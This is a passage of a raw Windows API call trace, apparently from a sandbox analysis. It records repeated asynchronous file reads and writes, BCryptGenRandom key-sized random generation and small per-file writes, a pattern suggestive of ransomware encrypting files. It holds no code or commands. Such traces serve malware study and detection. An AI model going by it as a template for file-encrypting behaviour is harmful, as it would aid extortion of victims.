hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.331] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x66dc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.333] CloseHandle (hObject=0xf00) returned 1 [0102.334] free (_Block=0x1ff1e60) [0102.334] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0102.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0102.345] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.345] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.345] free (_Block=0x3df0008) [0102.345] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.345] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.345] free (_Block=0x3df0008) [0102.345] free (_Block=0x2071818) [0102.345] free (_Block=0x77d800) [0102.345] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.347] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.374] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xea2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.374] CloseHandle (hObject=0xf00) returned 1 [0102.382] free (_Block=0x1ff1e60) [0102.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.496] WriteFile (in: hFile=0xf04, lpBuffer=0x3df015c, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 0x0 [0102.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.517] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x16cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.533] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.546] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0102.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.565] WriteFile (in: hFile=0x13c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0102.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0102.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0102.591] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.591] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.591] free (_Block=0x77d800) [0102.591] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.591] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.592] free (_Block=0x2071818) [0102.592] free (_Block=0x2071928) [0102.592] free (_Block=0x77d908) [0102.592] WriteFile (in: hFile=0x13c8, lpBuffer=0x3e300ac, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 0x0 [0102.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.603] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0102.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0102.605] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.605] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.605] free (_Block=0x77d800) [0102.605] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.605] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.605] free (_Block=0x2071818) [0102.606] free (_Block=0x2071928) [0102.606] free (_Block=0x77d908) [0102.606] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.606] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.628] WriteFile (in: hFile=0x13c8, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0102.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.661] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0102.662] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0102.663] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.663] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.663] free (_Block=0x77d800) [0102.663] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.663] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.664] free (_Block=0x2071818) [0102.664] free (_Block=0x2071928) [0102.664] free (_Block=0x77d908) [0102.664] WriteFile (in: hFile=0xf04, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0102.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0102.677] CloseHandle (hObject=0x13c0) returned 1 [0103.222] free (_Block=0x1ff1e60) [0103.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0103.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0103.238] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.238] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.238] free (_Block=0x77d800) [0103.238] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.238] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.239] free (_Block=0x2071818) [0103.239] free (_Block=0x2071928) [0103.239] free (_Block=0x77d908) [0103.239] WriteFile (in: hFile=0x13b4, lpBuffer=0x3e7011c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 1 [0103.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.243] WriteFile (in: hFile=0x13b4, lpBuffer=0x3e7011c, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 0x0 [0103.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0103.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0103.263] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.263] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.263] free (_Block=0x77d800) [0103.263] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.263] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.264] free (_Block=0x2071818) [0103.264] free (_Block=0x2071928) [0103.264] free (_Block=0x77d908) [0103.264] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0103.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0103.275] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.275] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.276] free (_Block=0x77d800) [0103.276] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.276] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.276] free (_Block=0x2071818) [0103.276] free (_Block=0x2071928) [0103.276] free (_Block=0x77d908) [0103.276] WriteFile (in: hFile=0x13c8, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0103.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.285] CloseHandle (hObject=0x13c0) returned 1 [0103.287] free (_Block=0x1ff1e60) [0103.287] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.298] ReadFile (in: hFile=0x13b4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1204, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0103.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.323] WriteFile (in: hFile=0xf00, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0103.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.357] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0103.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0103.366] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.367] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.367] free (_Block=0x77d800) [0103.367] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.367] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.367] free (_Block=0x2071818) [0103.367] free (_Block=0x2071928) [0103.367] free (_Block=0x77d908) [0103.367] WriteFile (in: hFile=0xf00, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0103.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.383] CloseHandle (hObject=0x13c8) returned 1 [0103.385] free (_Block=0x3d70048) [0103.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.389] CloseHandle (hObject=0x13b4) returned 1 [0103.390] free (_Block=0x3e70008) [0103.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.390] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.440] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.453] WriteFile (in: hFile=0x2f8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0103.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.467] ReadFile (in: hFile=0x710, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0103.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0103.505] WriteFile (in: hFile=0x304, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0103.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0106.687] CloseHandle (hObject=0x13c0) returned 1 [0106.692] free (_Block=0x3db00b8) [0106.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0106.719] CloseHandle (hObject=0x2f4) returned 1 [0106.720] free (_Block=0x3d70048) [0106.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0106.722] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.722] GetQueuedCompletionStatus (in: 